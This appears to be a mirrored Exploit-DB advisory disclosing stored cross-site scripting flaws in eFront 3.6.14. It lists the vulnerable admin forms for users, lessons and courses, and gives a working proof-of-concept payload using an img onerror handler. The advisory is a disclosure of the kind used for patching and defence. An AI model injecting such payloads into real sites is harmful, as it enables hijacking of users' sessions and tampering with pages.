eFront 3.6.14 (build 18012) – Multiple Persistent Cross-Site Scripting Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： sajith
  日期： 2013-12-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30213/

• ###########################################################
  
  Exploit-DB Note: Screenshot provided by exploit author.
  
  ###########################################################
  [~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
  Parameters
  [~] Author: sajith
  [~] version: eFront v3.6.14- build 18012
  [~]Vendor Homepage: http://www.efrontlearning.net/
  [~] vulnerable app link:http://www.efrontlearning.net/download
  ###########################################################
  
  
  
  POC by sajith shetty:
  
  [###]Log in with admin account and create new user
  
  http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1
  
  (Home � Users � Administrator S. (root) � New user)
  
  Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
  onerror=prompt(1);>]
  
  
  
  [###]create new lesson option (
  http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
  ?
  
  ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss
  
  [payload:"><img src=x onerror=prompt(1);>]
  
  
  
  [###]create new courses option(
  http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
  ?
  
  ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
  stored XSS